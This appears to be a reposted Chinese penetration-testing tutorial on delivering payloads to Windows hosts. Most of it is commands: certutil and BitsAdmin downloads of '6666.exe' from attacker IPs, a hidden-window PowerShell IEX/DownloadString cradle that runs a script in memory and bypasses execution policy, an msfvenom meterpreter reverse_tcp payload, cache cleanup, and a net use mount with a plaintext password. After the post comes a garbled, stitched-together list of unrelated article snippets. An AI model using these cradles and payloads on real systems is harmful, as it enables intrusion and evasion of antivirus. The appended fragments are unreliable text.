渗透测试常用文件传输方法-Windows篇(如何向Windows服务器中上传文件?) (゚益゚メ) 渗透测试

2023-05-16

文章目录

  • 文件传输
    • certutil
    • BitsAdmin
    • Powershell
    • SCP
    • Windows文件共享

文件传输

文件传输在渗透测试中主要用于将攻击载荷上传到目标主机或者获取目标资产使用。
下面我说的下载统一为攻击机向目标机传输文件,上传则相反!
下面很多下载我都是在Linux上开启的下载服务,可以看我在Linux篇写的攻击机挂载文件: https://xunmi.blog.csdn.net/article/details/115370320
注意: 下述所有命令,如果你是在powershell中执行的,则无需在开头写powershell,如果是在cmd中执行的,这需要写powershell。下述所有命令没有特殊说明的情况下,我都是使用powershell做示例!(看命令行开头有PS这代表是powershell!)

certutil

certutil是Windows内置的一个证书服务的一部分,其中有可以被我们利用的下载模块。

  • 优势: 方便易用,支持大多数文件下载
  • 缺点: 不支持文件上传,而且下载文件后留有缓存
# 显示或删除 URL 缓存项目
-URLCache
# 分离嵌入的抽象语法标记1(ASN.1)元素,并保存到文件
-URLCache -split
# 强制执行
-URLCache -f
# 强制执行将目标文件保存到指定地址
certutil.exe -urlcache -split -f 目标文件 保存地址
# 如
certutil -urlcache -split -f http://43.128.11.31:8000/6666.exe C:\临时\下载文件.exe

在这里插入图片描述
上述在介绍命令的时候也能看出这种下载方式是利用了cetutil的缓存机制,所以会留下缓存的文件。默认缓存路径%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

# 删除缓存
certutil.exe -urlcache -split -f 目标文件 delete
# 如
certutil.exe -urlcache -split -f http://43.128.11.31:8000/6666.exe delete

BitsAdmin

  • 优势: 专门用来传输文件的工具,传输功能齐全。
  • 缺点: 下载目标必须是真实的HTTP协议,如阿帕奇,不支持Python之类的脚本开启的临时服务。
# 下载文件
bitsadmin /transfer 任务名 下载地址 保存地址(最后需要加上保存文件的名字)
# 如
bitsadmin /transfer 下载任务 http://43.128.11.131/1.txt C:\Users\xunmi\Desktop\网安\下载文件.txt

在这里插入图片描述

Powershell

  • 优势: 简单易用,适用性广。(并且支持Python之类的脚本语言开启的简易web服务!)
  • 缺点: 被大多数杀软判定为安全重灾区,会受到很多杀软的’特殊关照’!
  1. 方法一: 调用内置对象system.net.webclient(提供常用的方法来发送和接收由URI标识的一个资源中的数据)
# 最基础的文件下载
## 创建一个新的对象
$p = new-object system.net.webclient
## 调用此实例来下载目标文件
$p.downloadfile("下载地址","保存地址")
# 合并版
## powershell中执行
$p=new-object system.net.webclient;$p.downloadfile('下载地址','保存地址')
## cmd中执行
powershell -c "$p=new-object system.net.webclient;$p.downloadfile('下载地址','保存地址')"
powershell -c "$p=new-object system.net.webclient;$p.downloadfile('http://43.128.11.131:8000/6666.exe','C:\Users\xunmi\Desktop\网安\6666.exe')"
# 简写版
(new-object system.net.webclient).downloadfile("下载地址","保存地址")
(new-object system.net.webclient).downloadfile('http://43.128.11.131:8000/6666.exe','C:\Users\xunmi\Desktop\网安\6666.exe')

PS: 保存地址尽量写绝对路径!

  1. 方法二:调用Invoke-WebRequest方法,此方法有几个别名,iwr,wget,curl,使用此别名和此方法名效果是完全相同的!如果你看了我之前写的linux篇或本身对Linux文件传输就有所了解应该会对这几个别名感觉非常熟悉!
# 使用方法
Invoke-WebRequest -uri "下载地址" -OutFile "保存地址"
# 使用别名效果相同,并且-uri可以省略
wget "下载地址" -OutFile "保存地址"
# 比如
wget 'http://43.128.11.131:8000/6666.exe' -OutFile 'C:\Users\xunmi\Desktop\网安\6666.exe'
  1. 方法三: 加文件加载如内存,无文件落地,这里需要调用到内置对象Net.WebClient
# -windowstyle 窗口模式(这里我选择隐藏窗口) 
# -exec 执行策略,可以简写为-ep(默认策略无法在内存中执行,这里选择bypass)
# IEX 加载到内存,无文件落地
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('下载地址');脚本名";
# http://192.168.1.200:8000/shell.ps1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:8000/shell.ps1');shell.ps1";
# 使用msf生成一个测试目标
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=6666 -f psh-reflection -o shell.ps1

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:8000/shell.ps1');shell.ps1";

SCP

scp有点像ssh的连接语法,也是一个非交互的文件传输方法,同样也会自动调用ssh的免密认证。并且这种方法不仅可以下载文件,还可以下载文件夹还有上传文件和文件夹操作!

# 下载文件
scp 用户名@服务器地址:目标文件 保存地址
# 如
scp root@43.128.11.131:/root/渗透测试/1.txt F:\下载\临时\1.txt
# 下载文件夹(需要-r参数)
scp -r 用户名@服务器地址:目标文件夹 保存地址
# 如
scp -r root@43.128.11.131:/root/渗透测试/挂载脚本 F:\下载\临时\
# 上传文件
scp 上传文件 用户名@服务器地址:目标目录
# 如
scp F:\下载\临时\火星船票.png root@43.128.11.131:/root/渗透测试/上传的图片.png
# 同样如果想上传文件夹,只需要添加-r参数即可
scp -r F:\下载\临时 root@43.128.11.131:/root/渗透测试

在这里插入图片描述

Windows文件共享

文件共享在内网横向渗透中会比较常用。

# 查看当前本机可共享的文件夹
net share
# 如下图,可以看出默认情况下,我们几个磁盘都会被共享,对方如果有我们主机的账户的话是可以直接远程挂载的!

在这里插入图片描述

# 挂载方式
net use 本地盘符 \\目标IP地址\目标共享名
# 或
net use 本地盘符 \\目标IP地址\目标共享名 "目标用户密码" /user:目标用户名
net use Y: \\192.168.1.251\Users "8ge8+1ge1" /user:xunmi
# 但一般默认共享的目录只有administrator及以上权限用户才有资格连接

在这里插入图片描述
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

渗透测试常用文件传输方法-Windows篇(如何向Windows服务器中上传文件?) (゚益゚メ) 渗透测试 的相关文章

  • 磁编码器MT6835_SPI读取位置信息

    文章目录 磁编码器MT6835 SPI读取位置信息简介应用特性和优势参考资料Cubemx 创建 STM32 工程读取编码器位置信息添加 SPI 读取位置信息代码编码器位置信息输出 磁编码器MT6835 SPI读取位置信息 简介 MT6835
  • 四旋翼无人机飞控系统设计(方案篇)

    简介 四旋翼无人机为多旋翼无人机中最经典的机型 xff0c 此设计为四旋翼无人机飞控系统设计 xff08 侧重软件 xff09 xff0c 这里主要涉及基于MCU的无人机飞控程序的编写 xff0c 使用的无人机机架 电机 电调 锂电池 航模
  • 运算放大器-虚短虚断

    运算放大器 虚短虚断 虚短虚断 虚短 虚短指在理想情况下 xff0c 两个输入端的电位相等 xff0c 就好像两个输入端短接在一起 xff0c 但事实上并没有短接 xff0c 称为 虚短 虚短的必要条件是运放引入深度负反馈 V 43 61
  • vscode 配置头文件路径

    1 打开 VSCode 界面 xff0c 在左下角找到齿轮 打开设置 xff0c 点击配置文件 2 在配置文件中添加相应的头文件路径
  • vscode 编码格式配置及保存(统一工程的编码格式,防止中文注释乱码)

    使用 VSCode 统一工程的编码格式 打开不同编码格式的文件 xff0c 点击右下角编码格式 xff0c 通过不同的编码来保存 xff0c 防止更改编码格式时导致中文注释乱码
  • CentOS7安装oracle12G调不出图形化界面

    问题 xff1a centos如果无图形化界面 xff0c 在安装oracle xff0c 调用图形化界面时会遇到问题 xff0c 报错为 xff1a 无法使用命令 usr bin xdpyinfo 自动检查显示器颜色 请检查是否设置了 D
  • STM32外围电路硬件解析

    复位电路 xff1a 复位 xff1a 让MCU回到最开始的状态 并且从头开始 xff0c 重新执行程序 我们什么时候需要复位 xff1f 1 烧录的时候 2 程序跑飞了的时候 3 上电复位 xff08 上电的时候需要复位 xff09 复位
  • stm32f103——中断——UART中断服务函数

    在程序中 xff0c CPU对外界突发事件进行处理的方式又两种 xff1a 1 轮询系统 xff1a xff08 在main中 xff0c 使用while循环 xff0c 进行循环判断外界事物是否发生 xff09 while xff08 1
  • Docker快速入门,看这个就够了

    Docker快速入门 一 Docker介绍1 1 Docker背景1 2 Docker概念1 3 Docker的优势1 4 Docker的三个基本概念 二 Docker的安装和使用2 1 安装依赖包2 2 安装Docker 三 启动Dock
  • Kubernetes(K8S)集群部署搭建图文教程(最全)

    Kubernetes 集群安装 前期准备集群安装系统初始化Harbor采取私有的仓库去镜像使用集群检测集群功能演示 前期准备 第一步 xff1a Router软路由构建 第二步 xff1a centos7安装 5台 xff08 自行安装 x
  • 【STM32-HAL库】一步步搭建出FOC矢量控制(附C代码)

    说明 本文为无刷电机或PMSM电机驱动的简易代码 xff0c 旨在分享一些个人调试过程的小心得 xff0c 提供一个demo文件 xff0c 程序仍有许多不完善的地方 xff0c 建立起个人的FOC底层驱动 xff0c 可以帮助快速熟悉FO
  • Ubuntu整个系统迁移到其他盘办法

    Ubuntu整个系统迁移到其他盘办法 一 xff1a 制作U盘启动器 xff0c 刻录Ubuntu系统 从U盘引导进入系统 xff0c 点击 xff1a try Ubuntu without install选项 二 xff1a 把需要迁移的
  • 四旋翼无人机飞控系统设计(基础知识篇)

    飞行原理 四旋翼的结构组装有十字模式和X模式之分 xff0c 两者的基本原理一致 xff0c 方向结构不同 xff0c 都是通过四个电机的组合状态进行控制姿态飞行 xff0c 而十字型四旋翼机头是对准其中一个电机的 xff0c X型的四旋翼
  • 大数据组件-Maxwell常用命令(持续更新完善)

    Download Download binary distro https github com zendesk maxwell releases download v1 33 0 maxwell 1 33 0 tar gz Sources
  • 【px4编译】make px4fmu-v3_default upload 不能使用

    今天遇到编译pixhawk2代固件无法upload的问题 xff0c 出现TypeError a bytes like object is required not str xff0c 在1代中是可以make upload的 ninja E
  • 【PX4代码】关于px4代码中timestamp与gps_itow的时间问题

    gps的输出频率为5hz xff0c 由此可见timestamp应该是113248090 1e 6转换为s xff0c 由次可见gps的itow时间应该为271998999 1e 3转换为s 总结 px4中的时间为cpu应该除以10 6 x
  • 【PX4代码】关于ekf2输出频率只有1ohz的问题

    问题 我在使用的是pixhawk 2代 imu的输出频率都在100hz以上 xff0c 使用的gps模块输出频率为5hz xff0c 使用log的local position csv 查看ekf2估计输出的点位信息只有10hz xff0c
  • Keil4中C51的debug调试步骤技巧

    1 选择相应的调试仿真连接器 xff1a 选择 xff1a project gt Options for Target 如下图所示 xff1a 然后在弹出对话框的Debug选项下选择仿真器的型号 xff1a 2 进入调试 xff1a 3 部
  • 怎么操作linux服务器

    Linux 服务器就是采用 Linux 系统的网络服务器 xff0c 同时也有采用 windows 的服务器 xff0c 作用是类似的 而 Linux 并不是一个特定的系统 xff0c 而是使用 Linux 内核的系统 xff0c 现在发行
  • 人工智能如何可以思考?

    近日在给同事讲人工智能的时候 xff0c 提到当数据量不够的时候 xff0c 必要时需要加入人工工程 xff0c 引导计算机 归纳 一些知识 xff0c 毕竟计算机智能比起人类智能 xff0c 最大的缺陷可能在于不懂得 举一反三 换句话说

随机推荐

  • bag文件内topic对应的frame_id查看指令

    启动ROS roscore 运行数据集 span class token comment 数据集小的话 xff0c 建议慢速播放 span rosbag play xxx span class token punctuation span
  • GPS数据类型(ROS)

    文章目录 一 传感器分类二 作用三 系统组成四 位置表示五 数据格式六 ROS中GPS数据格式sensor msgs NavSatFixROS中GPS数据主要包含这四类 xff0c 分别是gps 裸数据ros封装 xff0c 位置 xff0
  • cmake使用教程

    CMakeLists txt文档编写以及packsge xml文档介绍 CMakeLists txt文档一 cmake minimum required命令二 CMake中的编译类型三 cmake编译选项 xff08 与2对应 xff09
  • 四旋翼无人机飞控系统设计(闭环控制系统)

    对于一个简单的飞控程序来说 xff0c 控制器是它最核心的部分 xff0c 这里主要与大家讨论控制系统的基本理论知识 xff08 自控大佬请绕道 xff09 xff0c 包括控制系统概念 闭环控制系统的原理 下篇将侧重包含pid控制算法的具
  • 针对frame_id和child_frame_id的理解

    ros基础必看之各个frame的理解 ROS坐标系统 xff0c 常见的坐标系和其含义 ROS中TF 坐标系转换 原理与使用
  • IMU预积分学习

    IMU预积分学习 一 IMU状态传递方程 一 IMU状态传递方程 几种不同的表达形式 xff1a 1 lio mapping xff1a 参考大佬 xff1a lio mapping 及 VINS Mono代码及理论推导 xff08 2 x
  • Python3 内置模块 - os

    方法名说明os access判断文件权限os chdir改变当前工作目录os chmod file 修改文件权限os execvp 启动一个新进程os execvp 执行外部程序脚本 xff08 Uinx xff09 os fork 获取父
  • AttributeError: module 'tornado.web' has no attribute 'asynchronous'解决方法

    AttributeError module tornado web has no attribute 39 asynchronous 解决方法 今天看tornado异步时发现的错误 xff0c 查了一下 xff0c 原来tornado6以后
  • 【STM32项目】- 人体检测(体温、心率、心跳、跌倒检测)

    STM32人体检测 xff08 体温 心率 心跳 跌倒检测 xff09 43 zigbee 笔者前言 在闲鱼有缘结识的一个哥们 xff0c 帮助做的基于STM32人体检测系统 xff0c 我负责硬件程序开发设计 xff0c 哥们负责客户端服
  • ESP32 之 esp32-cam wifi拍照传图系统1

    文章目录 ESP32 之 esp32 cam wifi拍照传图系统1 效果演示2 材料准备3 原理图接线4 下载代码 ESP32 之 esp32 cam wifi拍照传图系统 1 效果演示 2 材料准备 ESP32 camUSB转TTL按钮
  • ESP32 之 esp32-cam wifi拍照传图系统2

    ESP32 之 esp32 cam wifi拍照传图系统 补充说明 ESP32 CAM总结 一 ESP32初识 ESP32 CAM模组的核心芯片 xff1a ESP32 S 模块是一款超小体积的多功能通用型 802 11b g n WiFi
  • 【PX4 飞控二次开发】第一个程序 打印输出-模拟

    第一个程序 1 编写任务代码 Cmake文件2 编译 1 编写任务代码 Cmake文件 span class token operator span span class token operator span PIX4 span clas
  • 【PX4 飞控二次开发】UORB 发布及订阅自定义

    UORB测试 一 添加msg1 创建 msg文件2 Cmakelists txt修改3 编译错误4 编译成功 二 发布及订阅主题1 添加代码2 修改cmake3 再次编译 一 添加msg 1 创建 msg文件 span class toke
  • 【PX4 飞控二次开发】自制ESP8266WIFI数传

    ESP8266数传模块 一 简介二 下载烧录固件1 下载MavLink ESP8266固件2 烧录 三 连线四 配置ESP8266五 连接WIFI Bridge 一 简介 ESP8266是一款低成本 xff0c 易于使用的Wi Fi模块 x
  • 四旋翼无人机飞控系统设计(PID控制算法)

    PID控制算法 PID控制器是一个结构简单并且成熟稳定的控制器 xff0c 在工业上应用广泛 包括比例 xff08 Proportion xff09 积分 xff08 Integral xff09 微分 xff08 Differential
  • 树莓派入门-环境搭建

    树莓派环境搭建 一 修改文件1 1系统安装1 2添加修改文件 二 更换源加速2 1修改sources list2 2修改raspi list2 3更新系统 三 配置系统3 1摄像头 VNC3 2安装TFTP服务3 3固定IP3 4分辨率修改
  • STM32实战-串口通信方式汇总

    STM32实战 串口通信方式汇总 1 串口基本概念1 1 串口通讯 Serial Communication 1 2 串口通讯的数据格式1 3 通讯方式1 4 串口物理链路形式1 5 同步通信和异步通信 2 STM32 串口配置2 1 US
  • 【STM32项目】老人健康跌倒检测系统实现

    目录 基于STM32老人跌倒检测系统实现一 功能展示二 硬件方案2 1 模组选型2 2 硬件设计 三 软件实现3 1功能概述3 2软件平台 四 实现原理 xff08 持续更新 xff09 3 1 跌倒算法实现3 2 心率血氧检测3 3 红外
  • Linux常用提权方法 (゚益゚メ) 渗透测试

    文章目录 简介常用命令汇总 靶机环境Linux提权方法Linux提权漏洞利用脏牛 Dirty COW CVE 2016 5195漏洞CVE 2019 7304漏洞CVE 2019 13272漏洞CVE 2021 3156漏洞 Linux环境
  • 渗透测试常用文件传输方法-Windows篇(如何向Windows服务器中上传文件?) (゚益゚メ) 渗透测试

    文章目录 文件传输certutilBitsAdminPowershellSCPWindows文件共享 文件传输 文件传输在渗透测试中主要用于将攻击载荷上传到目标主机或者获取目标资产使用 下面我说的下载统一为攻击机向目标机传输文件 上传则相反